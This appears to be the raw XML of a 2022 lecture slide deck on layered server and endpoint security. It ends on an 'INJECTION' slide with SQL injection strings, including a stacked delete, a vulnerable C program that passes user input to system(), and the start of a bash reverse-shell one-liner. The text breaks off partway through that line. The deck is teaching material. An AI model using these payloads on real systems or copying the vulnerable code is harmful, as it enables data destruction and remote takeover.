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5087" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId18"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId19"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="384" r:id="rId3"/>
    <p:sldId id="386" r:id="rId4"/>
    <p:sldId id="381" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="374" r:id="rId7"/>
    <p:sldId id="372" r:id="rId8"/>
    <p:sldId id="375" r:id="rId9"/>
    <p:sldId id="373" r:id="rId10"/>
    <p:sldId id="376" r:id="rId11"/>
    <p:sldId id="377" r:id="rId12"/>
    <p:sldId id="378" r:id="rId13"/>
    <p:sldId id="379" r:id="rId14"/>
    <p:sldId id="380" r:id="rId15"/>
    <p:sldId id="383" r:id="rId16"/>
    <p:sldId id="38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E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14"/>
    <p:restoredTop sz="76732"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="1864" y="200"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-93776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83" d="100"/>
          <a:sy n="183" d="100"/>
        </p:scale>
        <p:origin x="-16" y="-1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BD21BF-5149-3849-8FB0-4E7E31C70C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0A3647-C7AD-3C46-887A-782AC320605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81162-D453-1B41-AEBD-0F17FF4CEB2D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/1/22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B73A35-FAE0-B547-93FF-CBA92B71DB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758C5B-3475-AF4C-B5FB-EE8D760E40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1F9EA-7D81-6D45-9E4B-F5F2CE47A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392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3674D-D307-7E43-9892-ED037B6E8C59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E816E9-0FC4-9647-B74C-5B764F267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634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042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051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5402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01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547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698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93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5402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83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5402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10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81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614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5402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823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5402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759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450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5402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253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17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5402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E816E9-0FC4-9647-B74C-5B764F267BD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46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533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602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284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3232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383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6897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6844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5897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7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938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7837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9635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238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847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5922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2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4965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088" r:id="rId1"/>
    <p:sldLayoutId id="2147485089" r:id="rId2"/>
    <p:sldLayoutId id="2147485090" r:id="rId3"/>
    <p:sldLayoutId id="2147485091" r:id="rId4"/>
    <p:sldLayoutId id="2147485092" r:id="rId5"/>
    <p:sldLayoutId id="2147485093" r:id="rId6"/>
    <p:sldLayoutId id="2147485094" r:id="rId7"/>
    <p:sldLayoutId id="2147485095" r:id="rId8"/>
    <p:sldLayoutId id="2147485096" r:id="rId9"/>
    <p:sldLayoutId id="2147485097" r:id="rId10"/>
    <p:sldLayoutId id="2147485098" r:id="rId11"/>
    <p:sldLayoutId id="2147485099" r:id="rId12"/>
    <p:sldLayoutId id="2147485100" r:id="rId13"/>
    <p:sldLayoutId id="2147485101" r:id="rId14"/>
    <p:sldLayoutId id="2147485102" r:id="rId15"/>
    <p:sldLayoutId id="2147485103" r:id="rId16"/>
    <p:sldLayoutId id="214748510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thehackernews.com/2022/10/high-severity-flaws-in-juniper-junos-os.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2022/10/hackers-actively-exploiting-cisco.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackster.io/news/wi-spy-98d985364820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bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/hackers-use-microsoft-iis-web-server-logs-to-control-malware/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/chrome-extensions-with-1-million-installs-hijack-targets-browsers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we.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/binary-payloads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pravinponnusamy.medium.com/reverse-shell-payloads-969366fa5aff" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.f5.com/csp/article/K12331123" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.snyk.io/lessons/malicious-code-injection/javascrip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bleepingcomputer.com/news/security/iran-s-atomic-energy-agency-confirms-hack-after-stolen-data-leaked-online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yble.com/2021/07/05/deep-dive-into-builder-of-notorious-babuk-ransomware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feed/update/urn:li:activity:6991819614439497728?updateEntityUrn=urn%3Ali%3Afs_feedUpdate%3A%28V2%2Curn%3Ali%3Aactivity%3A6991819614439497728%29" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.csoonline.com/article/3678311/phishing-attacks-increase-by-over-31-in-third-quarter-report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cisecurity.org/ei-isac" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thelakewoodscoop.com/news/fbi-and-cisa-issue-joint-ransomware-alert-for-all-healthcare-facilities/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-124r1.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1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EF0D7-6F20-1B41-8CF6-D015022C3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6938" y="1340582"/>
            <a:ext cx="10916841" cy="3410475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Why End-Point security is “a must”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="950643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6B5F8-B24B-AA4A-8D2F-8B7515465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493439"/>
            <a:ext cx="8610600" cy="1293028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Hardware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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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13468"/>
            <a:ext cx="10820400" cy="4809066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Production Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab space multi layer security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Physical Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Physical Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asset Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Administrators (multitiered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network (Routers/Switches) Administrators (multi tiered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote management and Localization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Centralized Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Staging Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="3">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Servers/Network isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="3">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Debug and troubleshooting intrusion control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100377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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>SERVER SECURITY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12CED-BE20-0A4C-B694-10B08D446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5999" y="3380302"/>
            <a:ext cx="10144654" cy="999885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>LAYER 4: Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3567802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6B5F8-B24B-AA4A-8D2F-8B7515465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493439"/>
            <a:ext cx="8610600" cy="1293028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Software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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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86467"/>
            <a:ext cx="10820400" cy="493606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Operating System Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>removal of extraneous services , applications, networking modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>kernel hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server virtualization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypervisors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DPDK/SRIOV optimization isolation and encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Networking virtualization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SDN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packet level host-to-host encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPV6 (ARP poisoning, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address spoofing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broadcast safeguarding (promiscuous mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NFVs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deep packet inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Behavior based traffic inspection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280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6B5F8-B24B-AA4A-8D2F-8B7515465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493439"/>
            <a:ext cx="8610600" cy="1293028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Software Security contd..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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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86467"/>
            <a:ext cx="10820400" cy="4936067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory fencing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storage virtualization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agent based localized monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Centralized LDAP authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policy based spinning (auto scaling)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grouped allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policy based Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Micro Services (Containers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L2 over L3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sidecar based management and recovery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524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6B5F8-B24B-AA4A-8D2F-8B7515465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623" y="493439"/>
            <a:ext cx="9407577" cy="1293028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Software Security Client-tier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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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86467"/>
            <a:ext cx="10820400" cy="4936067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Proxies (NGINX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Key Generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stateless and REST full APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAF (Web Application Firewall)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serverless Deployments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SaaS model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IAM Policy based resource allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applied Crypto Hardening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75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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6400" dirty="0"/>
              <a:t>WHY STILL GET HACKED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12CED-BE20-0A4C-B694-10B08D446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5999" y="2623279"/>
            <a:ext cx="10144654" cy="395740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1800" dirty="0"/>
              <a:t>Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://thehackernews.com/2022/10/hackers-actively-exploiting-cisco.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Zero Day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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sz="1800" dirty="0"/>
              <a:t>LOG vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.bleepingcomputer.com/news/security/hackers-use-microsoft-iis-web-server-logs-to-control-malware/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SYN Flooding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.hackster.io/news/wi-spy-98d985364820</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>RCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://thehackernews.com/2022/10/high-severity-flaws-in-juniper-junos-os.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>External Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.bleepingcomputer.com/news/security/chrome-extensions-with-1-million-installs-hijack-targets-browsers/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-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78211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256A-DA4F-F34D-B5A4-5B76332F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999" y="277319"/>
            <a:ext cx="10146186" cy="801974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INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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12CED-BE20-0A4C-B694-10B08D446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5999" y="1079293"/>
            <a:ext cx="10144654" cy="5831169"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>soubhik; delete * from student</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>soubhik’ OR ‘1’ =‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code Injection example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NullByte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Injection (NGINX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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#include &lt;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stdio.h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&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight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#include &lt;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unistd.h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&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight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int main(int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argc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, char **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argv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) {</a:t>
            </a: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char cat[] = "cat ";</a:t>
            </a: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char *command;</a:t>
            </a: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size_t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commandLength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;</a:t>
            </a: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commandLength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 =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strlen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(cat) +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strlen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(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argv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[1]) + 1;</a:t>
            </a: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command = (char *) malloc(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commandLength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);</a:t>
            </a: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strncpy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(command, cat,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commandLength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);</a:t>
            </a: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strncat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(command,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argv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[1], (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commandLength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 -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strlen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(cat)) );</a:t>
            </a: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system(command);</a:t>
            </a:r>
            <a:b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return (0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US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Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/77.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://learn.snyk.io/lessons/malicious-code-injection/javascript/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C3E3C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i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://support.f5.com/csp/article/K12331123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C3E3C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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 &gt;&amp; /dev/</a:t>
